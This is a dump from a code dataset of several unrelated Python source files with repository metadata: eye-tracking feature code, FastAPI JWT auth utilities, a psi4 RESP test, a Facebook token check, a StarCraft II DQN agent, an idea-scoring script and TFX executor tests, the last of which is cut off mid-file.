] | 12 | 2020-09-21T13:20:49.000Z | 2021-04-07T08:01:12.000Z | feature_generation/normalize/rolling_mean.py | s0lvang/ideal-pancake | f7a55f622b02b03a987d74cfdff1c51288bfb657 | [
"MIT"
] | null | null | null | def rolling_mean(data):
return [take_rolling_mean(df) for df in data]
def take_rolling_mean(df, window=20):
    """Append trailing rolling-mean columns for the gaze features and drop warm-up rows.

    For each of the four eye-tracking columns a ``<name>_rolling`` column
    holding the trailing ``window``-sample mean is added in place, then the
    first ``window`` rows (incomplete windows are NaN) are discarded.

    Args:
        df: frame containing at least the four feature columns below.
        window: trailing window length; defaults to 20 (the previously
            hard-coded value), now parameterised for reuse.

    Returns:
        The same frame (mutated in place) minus its first ``window`` rows.
    """
    feature_columns = (
        "pupil_diameter",
        "saccade_duration",
        "duration",
        "saccade_length",
    )
    for column in feature_columns:
        df[f"{column}_rolling"] = df[column].rolling(window).mean()
    # Rows with index < window have incomplete (NaN) or freshly warmed-up
    # windows; drop them so consumers only see fully-formed means.
    return df.iloc[window:]
| 25.529412 | 67 | 0.645161 |
3ac339e728b9d10c187e2b092542a9efcdb4b687 | 2,264 | py | Python | backend/utils.py | wanghaiqing2015/fastapi-vue-cms | 0cd1f8e08ea2389287530d04872c7d5bfccdeb62 | [
"MIT"
] | 7 | 2020-08-07T23:51:57.000Z | 2022-02-12T05:13:18.000Z | backend/utils.py | wanghaiqing2015/fastapi-vue-cms | 0cd1f8e08ea2389287530d04872c7d5bfccdeb62 | [
"MIT"
] | 2 | 2020-04-12T16:50:55.000Z | 2020-08-08T06:04:00.000Z | backend/utils.py | hjlarry/fastapi-vue-cms | 4157b2064ce77e35fc280573a2198cbc9a5db9b4 | [
"MIT"
] | null | null | null | import json
from datetime import datetime, timedelta
from typing import Any
import jwt
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.status import HTTP_403_FORBIDDEN
from passlib.context import CryptContext
from fastapi import Depends, Security, HTTPException
from fastapi.security import OAuth2PasswordBearer
from sqlalchemy.orm import Session
from backend import crud, config
from backend.schemas import TokenPayload
# Password hashing context: bcrypt, with automatic deprecation of old schemes.
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
# OAuth2 password flow; clients obtain bearer tokens from this endpoint.
reusable_oauth2 = OAuth2PasswordBearer(tokenUrl="/api/v1/login/access-token")
def verify_password(plain_password: str, hashed_password: str):
    """Check *plain_password* against its stored bcrypt hash."""
    return pwd_context.verify(plain_password, hashed_password)
def get_password_hash(password: str):
    """Hash *password* with the configured bcrypt context."""
    return pwd_context.hash(password)
def get_db(request: Request):
    """FastAPI dependency returning the DB session attached to request.state
    (presumably placed there by request middleware — confirm)."""
    return request.state.db
def get_current_user(
    db: Session = Depends(get_db), token: str = Security(reusable_oauth2)
):
    """FastAPI dependency: decode the bearer JWT and load the matching user.

    Raises HTTP 403 when the token is invalid/expired and HTTP 404 when the
    user id embedded in the token no longer exists.
    """
    try:
        payload = jwt.decode(token, config.SECRET_KEY, algorithms=[ALGORITHM])
        token_data = TokenPayload(**payload)
    except jwt.PyJWTError:
        raise HTTPException(
            status_code=HTTP_403_FORBIDDEN, detail="Could not validate credentials"
        )
    user = crud.user.get(db, id=token_data.user_id)
    if not user:
        raise HTTPException(status_code=404, detail="User not found")
    return user
ALGORITHM = "HS256"
access_token_jwt_subject = "access"
def create_access_token(*, data: dict, expires_delta: timedelta = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(minutes=15)
to_encode.update({"exp": expire, "sub": access_token_jwt_subject})
encoded_jwt = jwt.encode(to_encode, config.SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
class MyResponse(JSONResponse):
    """JSONResponse that wraps every payload as {"code": 0, "data": ...}."""

    def render(self, content: Any) -> bytes:
        envelope = {
            "code": 0,
            "data": content,
        }
        serialized = json.dumps(
            envelope,
            ensure_ascii=False,
            allow_nan=False,
            indent=None,
            separators=(",", ":"),
        )
        return serialized.encode("utf-8")
| 29.402597 | 83 | 0.706714 |
3ac4d21f2d05e601832ebe89aa297f1bde8e8600 | 2,577 | py | Python | tests/test_ex1.py | loriab/resp_gm | 36974ca2caf262ef40bf7a9586c12d65e0a29be5 | [
"BSD-3-Clause"
] | null | null | null | tests/test_ex1.py | loriab/resp_gm | 36974ca2caf262ef40bf7a9586c12d65e0a29be5 | [
"BSD-3-Clause"
] | 1 | 2019-01-15T20:33:32.000Z | 2019-01-15T20:33:32.000Z | tests/test_ex1.py | loriab/resp_gm | 36974ca2caf262ef40bf7a9586c12d65e0a29be5 | [
"BSD-3-Clause"
] | null | null | null | def test_ex1():
import psi4
import numpy as np
import resp
# Initialize molecule
mol = psi4.geometry(""" C 1.45051389 -0.06628932 0.00000000
H 1.75521613 -0.62865986 -0.87500146
H 1.75521613 -0.62865986 0.87500146
H 1.92173244 0.90485897 0.00000000
C -0.04233122 0.09849378 0.00000000
O -0.67064817 -1.07620915 0.00000000
H -1.60837259 -0.91016601 0.00000000
O -0.62675864 1.13160510 0.00000000""")
mol.update_geometry()
# Specify options
options = {'N_VDW_LAYERS' : 4,
'VDW_SCALE_FACTOR' : 1.4,
'VDW_INCREMENT' : 0.2,
'VDW_POINT_DENSITY' : 1.0,
'resp_a' : 0.0005,
'RESP_B' : 0.1,
}
# Call for first stage fit
charges1 = resp.resp([mol], [options])
print('Electrostatic Potential Charges')
print(charges1[0][0])
print('Restrained Electrostatic Potential Charges')
print(charges1[0][1])
# Reference charges are generated by the R.E.D.-III.5 tools
# with GAMESS as the quantum chemistry package
reference_charges1 = np.array([-0.294974, 0.107114, 0.107114, 0.084795,
0.803999, -0.661279, 0.453270, -0.600039])
print('Reference RESP Charges')
print(reference_charges1)
print('Difference')
print(charges1[0][1]-reference_charges1)
assert np.allclose(charges1[0][1], reference_charges1, atol=5e-4)
# Change the value of the RESP parameter A
options['resp_a'] = 0.001
# Add constraint for atoms fixed in second stage fit
constraint_charge = []
for i in range(4, 8):
constraint_charge.append([charges1[0][1][i], [i+1]])
options['constraint_charge'] = constraint_charge
options['constraint_group'] = [[2, 3, 4]]
options['grid'] = '1_%s_grid.dat' %mol.name()
options['esp'] = '1_%s_grid_esp.dat' %mol.name()
mol.set_name('stage2')
# Call for second stage fit
charges2 = resp.resp([mol], [options])
# Get RESP charges
print("\nStage Two:\n")
print('RESP Charges')
print(charges2[0][1])
reference_charges2 = np.array([-0.290893, 0.098314, 0.098314, 0.098314,
0.803999, -0.661279, 0.453270, -0.600039])
print('Reference RESP Charges')
print(reference_charges2)
print('Difference')
print(charges2[0][1]-reference_charges2)
assert np.allclose(charges2[0][1], reference_charges2, atol=5e-4)
| 36.295775 | 79 | 0.593326 |
3ac6b31791c0cfaed3de6874a765f1f48fec4c3e | 741 | py | Python | tunobase/social_media/facebook/utils.py | unomena/tunobase | 9219e6c5a49eecd1c66dd1b518640c5d678acab6 | [
"BSD-3-Clause"
] | null | null | null | tunobase/social_media/facebook/utils.py | unomena/tunobase | 9219e6c5a49eecd1c66dd1b518640c5d678acab6 | [
"BSD-3-Clause"
] | null | null | null | tunobase/social_media/facebook/utils.py | unomena/tunobase | 9219e6c5a49eecd1c66dd1b518640c5d678acab6 | [
"BSD-3-Clause"
] | null | null | null | '''
Created on 09 Nov 2013
@author: michael
'''
import json
import urllib2
import urllib
from django.conf import settings
import facebook
def validate_access_token(access_token):
    '''
    Validate a Facebook access token.

    Returns a (is_valid, user_id) tuple from the Graph API debug_token
    endpoint.
    '''
    # Facebook requires an application access token to inspect user tokens.
    app_token = facebook.get_app_access_token(
        settings.FACEBOOK_APP_ID,
        settings.FACEBOOK_APP_SECRET
    )
    query = urllib.urlencode({
        'input_token': access_token,
        'access_token': app_token,
    })
    response = urllib2.urlopen(
        "https://graph.facebook.com/debug_token?" + query
    )
    try:
        payload = json.loads(response.read())
    finally:
        response.close()
    token_info = payload['data']
    return token_info['is_valid'], token_info['user_id']
| 19.5 | 74 | 0.645074 |
3ac803ff9e5c1fc42b5e6459752425d80c4ba39a | 2,776 | py | Python | src/list_ideas.py | lxk1170/ideas-with-emotion | 89f5322189faca0ba2c00de8a87168ab54f2caa0 | [
"MIT"
] | null | null | null | src/list_ideas.py | lxk1170/ideas-with-emotion | 89f5322189faca0ba2c00de8a87168ab54f2caa0 | [
"MIT"
] | null | null | null | src/list_ideas.py | lxk1170/ideas-with-emotion | 89f5322189faca0ba2c00de8a87168ab54f2caa0 | [
"MIT"
] | null | null | null | import db
from pen import Pen
from idea import Idea
# Tuning knobs for idea scoring/traversal.
MIN_ENJOYMENT = 0.5  # enjoyment threshold (not referenced in this module)
MIN_RELEVANT = 2  # minimum relevant links (not referenced in this module)
MAX_DEPTH = 3  # how many "relevant" hops total_score may traverse
MIN_ACCEPTABLE_SCORE = 0.5  # avg_score threshold for a "good relative"
def list_ideas(pen):
    """Write every stored idea to *pen* with its average enjoyment, best first."""
    raw_ideas = db.load_all_ideas()

    # Make the "relevant" relation symmetric: if A lists B, B also lists A.
    for name, data in raw_ideas.items():
        for other_name, other_data in raw_ideas.items():
            if name == other_name:
                continue
            if name in other_data['relevant'] and other_name not in data['relevant']:
                data['relevant'].append(other_name)

    # Materialise Idea objects from the raw dicts.
    # TODO do this earlier on
    idea_objects = []
    for name, data in raw_ideas.items():
        idea = Idea(name, data.get('version', 0))
        idea.add_emotion(*data['emotions'])
        idea.add_enjoyment(**data['enjoyments'])
        idea_objects.append(idea)

    # Highest average enjoyment first.
    idea_objects = sorted(idea_objects, key=lambda item: item.avg_enjoyment())
    idea_objects.reverse()

    for idea in idea_objects:
        # NOTE: two data structures currently represent an idea (raw dict +
        # Idea object); total_score walks the raw dicts.
        (total, count, relatives) = total_score(raw_ideas, idea.name, [])
        # Round the individual average to one decimal place for display.
        individual_score = round(idea.avg_enjoyment() * 10.0) / 10
        pen.write(f"[{individual_score}] {idea}")
        pen.down()
# score each of the ideas by evaluating neighbors
def total_score(ideas, name, visited=None, depth=MAX_DEPTH):
    """Accumulate enjoyment scores over the "relevant" graph rooted at *name*.

    Performs a depth-limited walk (at most *depth* hops, each idea visited
    once) and sums enjoyment values along the way.

    Args:
        ideas: mapping of idea name -> raw idea dict with 'enjoyments'
            (criterion -> numeric value, possibly a string) and 'relevant'
            (list of neighbour names).
        name: idea to start the walk from.
        visited: names already seen; mutated in place by the recursion.
            Defaults to a fresh list per top-level call — the previous
            `visited=[]` was a shared mutable default, so visited state
            leaked between successive calls.
        depth: remaining hop budget.

    Returns:
        Tuple (summed enjoyment dict, number of ideas visited, names of
        ideas whose own average score exceeds MIN_ACCEPTABLE_SCORE).
    """
    if visited is None:
        visited = []
    if name in visited or depth <= 0:
        return ({}, 0, [])
    visited.append(name)

    data = ideas[name]
    total_count = 1

    # Seed the totals with this idea's own scores.
    total_enjoyments = {key: int(val) for key, val in data['enjoyments'].items()}

    # This idea qualifies as a "good relative" if its own average passes.
    good_relatives = [name] if avg_score(data['enjoyments']) > MIN_ACCEPTABLE_SCORE else []

    # Fold in each relevant neighbour's (recursive) contribution.
    for child in data['relevant']:
        child_scores, child_count, child_relatives = total_score(
            ideas, child, visited, depth - 1)
        total_count += child_count
        good_relatives += child_relatives
        for key, value in child_scores.items():
            total_enjoyments[key] = total_enjoyments.get(key, 0) + int(value)

    return (total_enjoyments, total_count, good_relatives)
def avg_score(enjoyments, count=1):
    """Mean of the enjoyment values normalised by *count*; 0 when undefined."""
    if len(enjoyments) == 0 or count == 0:
        return 0
    total = float(sum(int(value) for value in enjoyments.values()))
    return (total / len(enjoyments)) / count
if __name__ == '__main__':
    # Manual entry point: render the idea listing with a default Pen.
    list_ideas(Pen())
| 31.908046 | 92 | 0.636527 |
3acea141522edbabbe9dcfc8fdb02306077a23f4 | 6,988 | py | Python | pysc2/agents/myAgent/myAgent_6/decisionMaker/hierarchical_learning_structure.py | Hotpotfish/pysc2 | 3d7f7ffc01a50ab69d435b65c892cd0bc11265a8 | [
"Apache-2.0"
] | null | null | null | pysc2/agents/myAgent/myAgent_6/decisionMaker/hierarchical_learning_structure.py | Hotpotfish/pysc2 | 3d7f7ffc01a50ab69d435b65c892cd0bc11265a8 | [
"Apache-2.0"
] | null | null | null | pysc2/agents/myAgent/myAgent_6/decisionMaker/hierarchical_learning_structure.py | Hotpotfish/pysc2 | 3d7f7ffc01a50ab69d435b65c892cd0bc11265a8 | [
"Apache-2.0"
] | null | null | null | import datetime
import pysc2.agents.myAgent.myAgent_6.config.config as config
from pysc2.agents.myAgent.myAgent_6.decisionMaker.DQN import DQN
import pysc2.agents.myAgent.myAgent_6.smart_actions as sa
import pysc2.agents.myAgent.myAgent_6.tools.handcraft_function as handcraft_function
from pysc2.env.environment import StepType
from pysc2.lib import actions
class decision_maker():
    """Pairs a DQN with the bookkeeping needed to form (s, a, r, s') transitions."""
    def __init__(self, network):
        self.network = network
        # Previous transition pieces; stay None until the first action is taken.
        self.previous_state = None
        self.previous_action = None
        self.previous_reward = None
        self.current_state = None
        # True until a saved model has been restored (continue-training mode).
        self.load_and_train = True
class hierarchical_learning_structure():
    """Two-level DQN hierarchy for pysc2.

    A top-level network picks which controller handles the current
    observation; the chosen controller network then picks a macro action
    together with its parameter slots.
    """
    def __init__(self):
        self.episode = -1
        self.begin_time = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
        # Observation tensor shape fed to every DQN: (batch, H, W, channels).
        self.DataShape = (None, config.MAP_SIZE, config.MAP_SIZE, 39)
        self.top_decision_maker = decision_maker(
            DQN(config.MU, config.SIGMA, config.LEARING_RATE, len(sa.controllers), 0, self.DataShape, 'top_decision_maker'))
        self.controllers = []
        for i in range(len(sa.controllers)):
            # 5 is the number of extra parameter slots; the slots hold the action id,
            # RAW_TYPES.queued, RAW_TYPES.unit_tags, RAW_TYPES.target_unit_tag and
            # RAW_TYPES.world (world occupies two positions).
            self.controllers.append(
                decision_maker(DQN(config.MU, config.SIGMA, config.LEARING_RATE, len(sa.controllers[i]), 5, self.DataShape, 'controller' + str(i))))
    def top_decision_maker_train_model(self, obs, modelLoadPath):
        """Epsilon-greedy controller choice while training the top network."""
        # Record the previous transition once a first action has been taken.
        if self.top_decision_maker.previous_action is not None:
            self.top_decision_maker.network.perceive(self.top_decision_maker.previous_state,
                                                     self.top_decision_maker.previous_action,
                                                     self.top_decision_maker.previous_reward,
                                                     self.top_decision_maker.current_state,
                                                     obs.last())
        # Continue-training mode: restore the saved model exactly once.
        if modelLoadPath is not None and self.top_decision_maker.load_and_train is True:
            self.top_decision_maker.load_and_train = False
            self.top_decision_maker.network.restoreModel(modelLoadPath)
            print('top')
        controller_number = self.top_decision_maker.network.egreedy_action(self.top_decision_maker.current_state)
        self.top_decision_maker.previous_reward = obs.reward
        self.top_decision_maker.previous_state = self.top_decision_maker.current_state
        self.top_decision_maker.previous_action = controller_number
        return controller_number
    def top_decision_maker_test_model(self, modelLoadPath):
        """Greedy controller choice from a saved model (no learning)."""
        return self.top_decision_maker.network.action(self.top_decision_maker.current_state, modelLoadPath)
    def choose_controller(self, obs, mark, modelLoadPath):
        """Pick a controller index for *obs*; mark is 'TRAIN' or 'TEST'."""
        self.top_decision_maker.current_state = handcraft_function.get_all_observation(obs)
        if mark == 'TRAIN':
            controller_number = self.top_decision_maker_train_model(obs, modelLoadPath)
            return controller_number
        elif mark == 'TEST':
            controller_number = self.top_decision_maker_test_model(modelLoadPath)
            return controller_number
    def controller_train_model(self, obs, controller_number, modelLoadPath):
        """Epsilon-greedy macro action (+parameters) from the chosen controller."""
        # Record the controller's previous transition, if any.
        if self.controllers[controller_number].previous_action is not None:
            self.controllers[controller_number].network.perceive(self.controllers[controller_number].previous_state,
                                                                 self.controllers[controller_number].previous_action,
                                                                 self.controllers[controller_number].previous_reward,
                                                                 self.controllers[controller_number].current_state,
                                                                 obs.last())
        if modelLoadPath is not None and self.controllers[controller_number].load_and_train is True:
            self.controllers[controller_number].load_and_train = False
            # NOTE(review): this restores into the *top* network rather than
            # this controller's own network — looks like a copy/paste bug; confirm.
            self.top_decision_maker.network.restoreModel(modelLoadPath)
            print('con' + str(controller_number))
        action_and_parameter = self.controllers[controller_number].network.egreedy_action(self.controllers[controller_number].current_state)
        self.controllers[controller_number].previous_reward = obs.reward
        self.controllers[controller_number].previous_state = self.controllers[controller_number].current_state
        self.controllers[controller_number].previous_action = action_and_parameter
        # Map network output to concrete game coordinates/arguments.
        action_and_parameter = handcraft_function.reflect(obs, action_and_parameter)
        action = handcraft_function.assembly_action(obs, controller_number, action_and_parameter)
        return action
    def controller_test_model(self, obs, controller_number, modelLoadPath):
        """Greedy macro action from a saved controller model (no learning)."""
        state = self.controllers[controller_number].current_state
        action_and_parameter = self.controllers[controller_number].network.action(state, modelLoadPath)
        macro_and_parameter = handcraft_function.reflect(obs, action_and_parameter)
        action = handcraft_function.assembly_action(obs, controller_number, macro_and_parameter)
        return action
    def choose_macro(self, obs, controller_number, mark, modelLoadPath):
        """Delegate macro selection to the chosen controller in train or test mode."""
        self.controllers[controller_number].current_state = handcraft_function.get_all_observation(obs)
        if mark == 'TRAIN':
            action = self.controller_train_model(obs, controller_number, modelLoadPath)
            return action
        elif mark == 'TEST':
            action = self.controller_test_model(obs, controller_number, modelLoadPath)
            return action
    def get_save_and_loadPath(self, mark, modelSavePath, modelLoadPath):
        """Advance the episode counter and refresh save/load paths.

        NOTE(review): paths are only assigned in 'TRAIN' mode, yet
        make_choice dereferences self.modelLoadPath in 'TEST' mode too —
        that would raise AttributeError; confirm intended use.
        """
        self.episode += 1
        time = str(self.begin_time)
        if mark == 'TRAIN':
            self.modelSavePath = modelSavePath + '/' + time + '/'
            self.modelLoadPath = modelLoadPath
    def train_all_neural_network(self):
        """Run one training step on the top network and every controller."""
        self.top_decision_maker.network.train_Q_network(self.modelSavePath, self.episode)
        for i in range(len(sa.controllers)):
            self.controllers[i].network.train_Q_network(self.modelSavePath, self.episode)
    def make_choice(self, obs, mark, modelSavePath, modelLoadPath):
        """Top-level entry point called every environment step."""
        if obs[0] == StepType.FIRST:
            # Episode start: refresh paths, then center the camera.
            self.get_save_and_loadPath(mark, modelSavePath, modelLoadPath)
            return actions.RAW_FUNCTIONS.raw_move_camera((config.MAP_SIZE / 2, config.MAP_SIZE / 2))
        elif obs[0] == StepType.LAST and mark == 'TRAIN':
            # Episode end: train all networks. NOTE(review): no action is
            # returned on this branch (implicitly None) — confirm callers cope.
            self.train_all_neural_network()
        else:
            controller_number = int(self.choose_controller(obs, mark, self.modelLoadPath)[0])
            action = self.choose_macro(obs, controller_number, mark, self.modelLoadPath)
            print(action)
            return action
| 50.637681 | 148 | 0.680309 |
3acee6b394ee9cc776b0a34e348bdc806db4720e | 2,064 | py | Python | brudnopis.py | Shandelier/py-tf-movenet-fork | f3eb866665f9e23ec313edf68df6302dd5786ed6 | [
"Apache-2.0"
] | 1 | 2021-06-09T07:05:23.000Z | 2021-06-09T07:05:23.000Z | brudnopis.py | Shandelier/python-movenet | f3eb866665f9e23ec313edf68df6302dd5786ed6 | [
"Apache-2.0"
] | null | null | null | brudnopis.py | Shandelier/python-movenet | f3eb866665f9e23ec313edf68df6302dd5786ed6 | [
"Apache-2.0"
] | null | null | null | # from sklearn.utils import shuffle
# import util as ut
# import os
# import pandas as pd
# import training_util as tut
# import numpy as np
# def sample_2000():
# file_paths, file_names, pose_type = ut.get_csvs_paths(
# os.path.join("5-people-csvs"))
# init = list.pop(file_paths)
# ds = pd.read_csv(init)
# for i, csv in enumerate(file_paths):
# read = pd.read_csv(csv)
# ds = pd.concat([ds, read], axis=0)
# # # ds.pop("filepath")
# # for p in tut.excessive_pred:
# # ds.pop(p)
# # for e in tut.excessive:
# # ds.pop(e)
# ds = ds.sample(2000)
# ds = shuffle(ds, random_state=420)
# ds = ds.reset_index(drop=True)
# print(ds.head())
# ds.to_csv(os.path.join(
# "results", "5_people_small.csv"), sep='\t', index=False, header=True)
# def negative():
# ds = pd.read_csv(os.path.join(
# "results", "5_people_small.csv"))
# pose = ds.pop("pose_type")
# file = ds.pop("filepath")
# negative = ds.loc[df.value]
# return 0
# sample_2000()
# import tensorflow as tf
# import tensorflow.keras.layers as layers
# import tensorflowjs as tfjs
# import os
# import train as t
# import util as ut
# import training_util as tut
# def main():
# model = tf.keras.Sequential([
# layers.Dense(22),
# layers.Dense(8, activation='relu'),
# layers.Dense(1, activation='sigmoid')
# ])
# model.compile(loss=tf.losses.MeanSquaredError(),
# optimizer=tf.optimizers.Adam())
# csvs, _, _ = ut.get_csvs_paths(r"./output")
# X, y, _ = t.load_split(csvs, 2, 2)
# model.fit(X, y, epochs=10)
# tfjs.converters.save_keras_model(model, tfjs_target_dir)
# main()
import numpy as np

# Scratch check: flattening a (1, 1, 17, 3) keypoint tensor column-wise
# (presumably 17 MoveNet keypoints x 3 values — confirm).
# write = np.hstack([fname,
#                    pose, np.squeeze(keypoints_with_scores).flatten()]).reshape([1, 53])
keypoints = np.linspace(1, 51, 51).reshape([1, 1, 17, 3])
squeezed = np.squeeze(keypoints)  # -> shape (17, 3)
# arr = np.array([arr[:, col] for col in range(3)]).squeeze().flatten()
arr = squeezed.T.flatten()  # groups all of column 0, then 1, then 2
print(arr)
| 23.724138 | 89 | 0.601744 |
3acef1e57e1e1cdd81c2829c115eefd77da35670 | 8,696 | py | Python | tfx/components/transform/executor_utils_test.py | avelez93/tfx | 75fbb6a7d50e99138609be3ca4c3a204a13a2195 | [
"Apache-2.0"
] | 1 | 2021-08-22T21:10:48.000Z | 2021-08-22T21:10:48.000Z | tfx/components/transform/executor_utils_test.py | avelez93/tfx | 75fbb6a7d50e99138609be3ca4c3a204a13a2195 | [
"Apache-2.0"
] | null | null | null | tfx/components/transform/executor_utils_test.py | avelez93/tfx | 75fbb6a7d50e99138609be3ca4c3a204a13a2195 | [
"Apache-2.0"
] | 1 | 2020-12-13T22:07:53.000Z | 2020-12-13T22:07:53.000Z | # Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.components.transform.executor_utils."""
import tensorflow as tf
from tfx.components.transform import executor_utils
from tfx.components.transform import labels
from tfx.proto import transform_pb2
from tfx.types import artifact_utils
from tfx.types import standard_artifacts
from tfx.types import standard_component_specs
from tfx.utils import proto_utils
class ExecutorUtilsTest(tf.test.TestCase):
  def testMaybeBindCustomConfig(self):
    """The custom_config JSON string is parsed and bound as a kwarg."""
    def dummy(custom_config):
      return custom_config
    patched = executor_utils.MaybeBindCustomConfig(
        {labels.CUSTOM_CONFIG: '{"value":42}'}, dummy)
    self.assertEqual({'value': 42}, patched())
  def testValidateOnlyOneSpecified(self):
    """Exactly one key must be present: zero or two keys raise ValueError."""
    executor_utils.ValidateOnlyOneSpecified({'a': 1}, ('a', 'b', 'c'))
    with self.assertRaisesRegex(ValueError, 'One of'):
      executor_utils.ValidateOnlyOneSpecified({'z': 1}, ('a', 'b', 'c'))
    with self.assertRaisesRegex(ValueError, 'At most one of'):
      executor_utils.ValidateOnlyOneSpecified({
          'a': [1],
          'b': '1'
      }, ('a', 'b', 'c'))
  def testValidateOnlyOneSpecifiedAllowMissing(self):
    """allow_missing=True tolerates zero matches but still rejects two."""
    executor_utils.ValidateOnlyOneSpecified({'z': 1}, ('a', 'b', 'c'), True)
    with self.assertRaisesRegex(ValueError, 'At most one of'):
      executor_utils.ValidateOnlyOneSpecified({
          'a': [1],
          'b': '1'
      }, ('a', 'b', 'c'), True)
  def testMatchNumberOfTransformedExamplesArtifacts(self):
    """Output artifact list is expanded to match the input artifact count."""
    input_dict = {
        standard_component_specs.EXAMPLES_KEY: [
            standard_artifacts.Examples(),
            standard_artifacts.Examples()
        ]
    }
    original_output_artifact = standard_artifacts.Examples()
    original_output_artifact.uri = '/dummy/path'
    output_dict = {
        standard_component_specs.TRANSFORMED_EXAMPLES_KEY: [
            original_output_artifact
        ]
    }
    executor_utils.MatchNumberOfTransformedExamplesArtifacts(
        input_dict, output_dict)
    self.assertLen(
        output_dict[standard_component_specs.TRANSFORMED_EXAMPLES_KEY], 2)
    # Uris of the new artifacts should be located under the original artifact.
    self.assertTrue(output_dict[
        standard_component_specs.TRANSFORMED_EXAMPLES_KEY][0].uri.startswith(
            original_output_artifact.uri))
  def testResolveSplitsConfigEmptyAnalyze(self):
    """A SplitsConfig without analyze splits is rejected."""
    wrong_config = transform_pb2.SplitsConfig(transform=['train'])
    with self.assertRaisesRegex(ValueError, 'analyze cannot be empty'):
      config_str = proto_utils.proto_to_json(wrong_config)
      executor_utils.ResolveSplitsConfig(config_str, [])
  def testResolveSplitsConfigOk(self):
    """A valid JSON-encoded SplitsConfig round-trips unchanged."""
    config = transform_pb2.SplitsConfig(
        analyze=['train'], transform=['train', 'eval'])
    config_str = proto_utils.proto_to_json(config)
    resolved = executor_utils.ResolveSplitsConfig(config_str, [])
    self.assertProtoEquals(config, resolved)
  def testResolveSplitsConfigInconsistentSplits(self):
    """Examples artifacts with differing split names are rejected."""
    examples1 = standard_artifacts.Examples()
    examples1.split_names = artifact_utils.encode_split_names(['train'])
    examples2 = standard_artifacts.Examples()
    examples2.split_names = artifact_utils.encode_split_names(['train', 'test'])
    with self.assertRaisesRegex(ValueError, 'same split names'):
      executor_utils.ResolveSplitsConfig(None, [examples1, examples2])
  def testResolveSplitsConfigDefault(self):
    """Without a config, 'train' is analyzed and every split is transformed."""
    examples1 = standard_artifacts.Examples()
    examples1.split_names = artifact_utils.encode_split_names(['train', 'test'])
    examples2 = standard_artifacts.Examples()
    examples2.split_names = artifact_utils.encode_split_names(['train', 'test'])
    resolved = executor_utils.ResolveSplitsConfig(None, [examples1, examples2])
    self.assertEqual(set(resolved.analyze), {'train'})
    self.assertEqual(set(resolved.transform), {'train', 'test'})
def testSetSplitNames(self):
# Should work with None.
executor_utils.SetSplitNames(['train'], None)
examples1 = standard_artifacts.Examples()
examples2 = standard_artifacts.Examples()
executor_utils.SetSplitNames(['train'], [examples1, examples2])
self.assertEqual(examples1.split_names, '["train"]')
self.assertEqual(examples2.split_names, examples1.split_names)
def testGetSplitPaths(self):
# Should work with None.
self.assertEmpty(executor_utils.GetSplitPaths(None))
examples1 = standard_artifacts.Examples()
examples1.uri = '/uri1'
examples2 = standard_artifacts.Examples()
examples2.uri = '/uri2'
executor_utils.SetSplitNames(['train', 'test'], [examples1, examples2])
paths = executor_utils.GetSplitPaths([examples1, examples2])
self.assertCountEqual([
'/uri1/Split-train/transformed_examples',
'/uri2/Split-train/transformed_examples',
'/uri1/Split-test/transformed_examples',
'/uri2/Split-test/transformed_examples'
], paths)
  def testGetCachePathEntry(self):
    """GetCachePathEntry maps cache artifacts onto executor path labels."""
    # Empty case: no artifact for the key yields no entry at all.
    self.assertEmpty(
        executor_utils.GetCachePathEntry(
            standard_component_specs.ANALYZER_CACHE_KEY, {}))
    cache_artifact = standard_artifacts.TransformCache()
    cache_artifact.uri = '/dummy'
    # input: the analyzer-cache key maps to the cache *input* path label.
    result = executor_utils.GetCachePathEntry(
        standard_component_specs.ANALYZER_CACHE_KEY,
        {standard_component_specs.ANALYZER_CACHE_KEY: [cache_artifact]})
    self.assertEqual({labels.CACHE_INPUT_PATH_LABEL: '/dummy'}, result)
    # output: the updated-cache key maps to the cache *output* path label.
    result = executor_utils.GetCachePathEntry(
        standard_component_specs.UPDATED_ANALYZER_CACHE_KEY,
        {standard_component_specs.UPDATED_ANALYZER_CACHE_KEY: [cache_artifact]})
    self.assertEqual({labels.CACHE_OUTPUT_PATH_LABEL: '/dummy'}, result)
  def testGetStatusOutputPathsEntries(self):
    """GetStatsOutputPathEntries maps the five stats/schema/anomalies
    artifacts onto their executor path labels.

    NOTE(review): the method name says "Status" while the function under
    test is GetStatsOutputPathEntries -- looks like a typo in the name.
    """
    # disabled: when the first argument is True, no entries are produced.
    self.assertEmpty(executor_utils.GetStatsOutputPathEntries(True, {}))
    # enabled: each artifact's uri must surface under its own label.
    pre_transform_stats = standard_artifacts.ExampleStatistics()
    pre_transform_stats.uri = '/pre_transform_stats'
    pre_transform_schema = standard_artifacts.Schema()
    pre_transform_schema.uri = '/pre_transform_schema'
    post_transform_anomalies = standard_artifacts.ExampleAnomalies()
    post_transform_anomalies.uri = '/post_transform_anomalies'
    post_transform_stats = standard_artifacts.ExampleStatistics()
    post_transform_stats.uri = '/post_transform_stats'
    post_transform_schema = standard_artifacts.Schema()
    post_transform_schema.uri = '/post_transform_schema'
    result = executor_utils.GetStatsOutputPathEntries(
        False, {
            standard_component_specs.PRE_TRANSFORM_STATS_KEY:
                [pre_transform_stats],
            standard_component_specs.PRE_TRANSFORM_SCHEMA_KEY:
                [pre_transform_schema],
            standard_component_specs.POST_TRANSFORM_ANOMALIES_KEY:
                [post_transform_anomalies],
            standard_component_specs.POST_TRANSFORM_STATS_KEY:
                [post_transform_stats],
            standard_component_specs.POST_TRANSFORM_SCHEMA_KEY:
                [post_transform_schema],
        })
    self.assertEqual(
        {
            labels.PRE_TRANSFORM_OUTPUT_STATS_PATH_LABEL:
                '/pre_transform_stats',
            labels.PRE_TRANSFORM_OUTPUT_SCHEMA_PATH_LABEL:
                '/pre_transform_schema',
            labels.POST_TRANSFORM_OUTPUT_ANOMALIES_PATH_LABEL:
                '/post_transform_anomalies',
            labels.POST_TRANSFORM_OUTPUT_STATS_PATH_LABEL:
                '/post_transform_stats',
